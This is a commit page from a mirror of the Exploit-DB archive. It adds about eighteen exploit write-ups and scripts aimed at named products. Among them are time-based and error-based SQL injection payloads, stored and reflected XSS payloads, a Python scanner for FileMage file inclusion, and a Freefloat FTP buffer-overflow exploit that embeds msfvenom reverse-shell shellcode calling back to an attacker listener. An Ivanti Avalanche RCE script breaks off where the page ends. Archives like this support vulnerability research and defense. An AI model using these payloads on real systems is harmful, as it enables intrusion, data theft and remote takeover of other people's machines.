bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-09-05

Browse source 
18 changes to exploits/shellcodes/ghdb

DLINK DPH-400SE - Exposure of Sensitive Information

FileMage Gateway 1.10.9 - Local File Inclusion

Academy LMS 6.1 - Arbitrary File Upload

AdminLTE PiHole 5.18 - Broken Access Control

Blood Donor Management System v1.0 - Stored XSS

Bus Reservation System 1.1 - Multiple-SQLi

Credit Lite 1.5.4 - SQL Injection
CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

Hyip Rio 2.1 - Arbitrary File Upload

Member Login Script 3.3 - Client-side desync

SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)

Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

Kingo ROOT 1.5.8 - Unquoted Service Path

NVClient v5.0 - Stack Buffer Overflow (DoS)

Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
This commit is contained in:
Exploit-DB 2023-09-05 00:16:27 +00:00
parent 4c8ac36b6c
commit 4e246a01fb
18 changed files with 838 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
exploits/hardware/webapps/51709.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information
# Date : 25-08-2023
# Exploit Author : tahaafarooq
# Vendor Homepage : https://dlink.com/
# Version : FRU2.2.15.8
# Tested on: DLINK DPH-400SE (VoIP Phone)
Description:
With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200
POC :
1. Login with the default guest credentials "guest:guest"
2. Access the Maintenance tab.
3. Under the maintenance tab, access the "Access" feature
4. On "Account Option" choose a user to modify, thus "Admin" and click modify.
5. Right click on the password, and click reveal, the password is then seen in plaintext.

39
exploits/multiple/webapps/51708.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html
import requests
import warnings
warnings.filterwarnings("ignore")
def worker(url):
response = requests.get(url, verify=False, timeout=.5)
return response
def main():
listIP = []
file_path = input("Enter the path to the file containing the IP addresses: ")
with open(file_path, 'r') as file:
ip_list = file.read().splitlines()
searchString = "tls"
for ip in ip_list:
url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
try:
response = worker(url)
#print(response.text)
if searchString in response.text:
print("Vulnerable IP: " + ip)
print(response.text)
listIP.append(ip)
except requests.exceptions.RequestException as e:
print(f"Error occurred for {ip}: {str(e)}")
for x in listIP:
print(x)
if __name__ == '__main__':
main()

20
exploits/php/webapps/51697.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Blood Donor Management System v1.0 - Stored XSS
# Application: Blood Donor Management System
# Version: v1.0
# Bugs: Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
# Date: 15.08.2023
# Author: Ehlullah Albayrak
# Tested on: Windows
#POC
========================================
1. Login to user account
2. Go to Profile
3. Change "State" input and add "<script>alert("xss")</script>" payload.
4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.
#Payload: <script>alert("xss")</script>

49
exploits/php/webapps/51698.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 30/07/2023
# Vendor: tdevs
# Vendor Homepage: https://tdevs.co/
# Software Link: https://hyiprio-feature.tdevs.co/
# Version: 2.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CVE: CVE-2023-4382
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /user/settings/profile-update HTTP/2
Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
Content-Type: image/png
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Skalvin");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg
[-] Done

56
exploits/php/webapps/51701.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Credit Lite 1.5.4 - SQL Injection
# Exploit Author: CraCkEr
# Date: 31/07/2023
# Vendor: Hobby-Tech
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
# Software Link: https://credit-lite.appshat.xyz/
# Version: 1.5.4
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4407
# CWE: CWE-89 - CWE-74 - CWE-707
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
## Steps to Reproduce:
To Catch the POST Request
1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement
2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]
Path: /portal/reports/account_statement
POST parameter 'date1' is vulnerable to SQL Injection
POST parameter 'date2' is vulnerable to SQL Injection
-------------------------------------------------------------------------
POST /portal/reports/account_statement HTTP/2
_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001
-------------------------------------------------------------------------
---
Parameter: date1 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001
Parameter: date2 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001
---
[-] Done

50
exploits/php/webapps/51702.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
[-] Done

41
exploits/php/webapps/51703.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.
# Steps to reproduce Stored XSS:
Go to url http://localhost/admin/carousel.
We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.
We can inject HTML code.
With the following payload we can achieve the XSS.
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
#PoC Request:
POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1
carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

39
exploits/php/webapps/51704.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.
# Steps to reproduce Stored XSS:
Go to url http://localhost/admin/plugin/gallery/edit/2.
When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.
With the following payload we can achieve the XSS
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
#PoC Request:
POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1
gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

28
exploits/php/webapps/51705.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513
In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]
## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]
data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>

88
exploits/php/webapps/51710.txt Normal file
View file

@ -0,0 +1,88 @@
## Title: Member Login Script 3.3 - Client-side desync
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
The server appears to be vulnerable to client-side desync attacks. A
POST request was sent to the path '/1692959852_473/index.php' with a
second request sent as the body. The server ignored the Content-Length
header and did not close the connection, leading to the smuggled
request being interpreted as the next request.
STATUS: HIGH Vulnerability
[+]Exploit:
```
POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=GA1.2.2069938240.1692907228;
_gid=GA1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
YellowPages=slk3eokcgmdf0r3t7c020quv35;
pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded
GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=pc; ss=405039333413129808;
fg_0d2ec4cbd943df07ec161982a603817e=60256.100000;
fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Full-Version: ""
Sec-Ch-Ua-Arch: ""
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Platform-Version: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
## Time spend:
00:35:00

53
exploits/php/webapps/51711.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
# Date: 13/02/2022
# Exploit Author: psychoSherlock
# Vendor Homepage: https://wp-statistics.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
# Version: 13.1.5 and prior
# Tested on: wp-statistics 13.1.5
# CVE : CVE-2022-25148
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# CVSS Score: 8.4 (High)
import argparse
import requests
import re
import urllib.parse
def main():
parser = argparse.ArgumentParser(description="CVE-2022-25148")
parser.add_argument('-u', '--url', required=True,
help='Wordpress base URL')
args = parser.parse_args()
baseUrl = args.url
payload = "IF(1=1, sleep(5), 1)"
wp_session = requests.session()
resp = wp_session.get(baseUrl)
nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
print(f"Gathered Nonce: {nonce}")
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload = urllib.parse.quote_plus(payload)
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'
exploit_url = baseUrl + exploit
print(f'\nSending: {exploit_url}')
resp = wp_session.get(exploit_url, headers=headers)
if float(resp.elapsed.total_seconds()) >= 5.0:
print("\n!!! Target is vulnerable !!!")
print(f'\nTime taken: {resp.elapsed.total_seconds()}')
else:
print('Target is not vulnerable')
if __name__ == "__main__":
main()

48
exploits/php/webapps/51712.txt Normal file
View file

@ -0,0 +1,48 @@
## Title: Bus Reservation System-1.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `pickup_id` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the pickup_id parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. The attacker can steal
information from all database!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: pickup_id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT
2098) END))&session_id=
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT
(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)
## Time spend:
00:25:00

39
exploits/php/webapps/51713.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4547
# CWE: CWE-79 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /search
GET parameter 'filter[brandid]' is vulnerable to XSS
GET parameter 'filter[price]' is vulnerable to XSS
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB
XSS Payloads:
vnxjb"><script>alert(1)</script>bvu51
[-] Done

30
exploits/windows/local/51700.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 2023-08-19
# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
# Vulnerability Type: Buffer Overflow Local
# Tested On: Windows 10 64bit
# Tested Version: 5.0
# Steps to Reproduce:
# 1- Run the python script and create exploit.txt file
# 2- Open the application and log in
# 3- Click the "Config" button in the upper menu
# 4- Click the "User" button just below it
# 5- Now click the "Add users" button in the lower left
# 6- Fill in the Username, Password, and Confirm boxes
# 7- Paste the characters from exploit.txt into the Contact box
# 8- Click OK and crash!
#!/usr/bin/env python3
exploit = 'A' * 846
try:
with open("exploit.txt","w") as file:
file.write(exploit)
print("POC is created")
except:
print("POC not created")

70
exploits/windows/local/51706.txt Normal file
View file

@ -0,0 +1,70 @@
#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3
#!/usr/bin/python
import socket
#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'
#nc -lvp 4444
#Send exploit
#offset = 247
#badchars=\x00\x0d\
#return_address=\x3b\x69\x5a\x77 (ole32.dll)
payload = (
"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
"\x19")
shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload
def main():
ip = '192.168.146.135'
port = 21
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.recv(1024)
sock.send('USER anonymous\r\n')
sock.recv(1024)
sock.send('PASS anonymous\r\n')
sock.recv(1024)
sock.send('pwd ' + shellcode + '\r\n')
sock.close()
if __name__ == '__main__':
main()

29
exploits/windows/local/51707.txt Normal file
View file

@ -0,0 +1,29 @@
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro
-------------Discovering Unquoted Path--------------
C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KingoSoftService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KingoSoftService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Anish>systeminfo
Host Name: DESKTOP-UT7E7CF
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045

122
exploits/windows/remote/51699.py Executable file
View file

@ -0,0 +1,122 @@
"""
Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27
"""
import socket
import struct
import sys
# Create an item structure for the header and payload
class Item:
def __init__(self, type_, name, value):
self.type = type_
self.name = name.encode()
self.value = value
self.name_size = 0x5
self.value_size = 0x800
def pack(self):
return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
self.type, self.name_size, self.value_size, self.name, self.value)
# Create a header structure
class HP:
def __init__(self, hdr, payload):
self.hdr = hdr
self.payload = payload
self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)
def pack(self):
return b''.join([item.pack() for item in self.hdr]) + \
b''.join([item.pack() for item in self.payload]) + self.pad
# Create a preamble structure
class Preamble:
def __init__(self, hp):
self.msg_size = len(hp.pack()) + 16
self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
self.payload_size = sum([len(item.pack()) for item in hp.payload])
self.unk = 0 # Unknown value
def pack(self):
return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)
# Create a message structure
class Msg:
def __init__(self, hp):
self.pre = Preamble(hp)
self.hdrpay = hp
def pack(self):
return self.pre.pack() + self.hdrpay.pack()
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
shellcode = b""
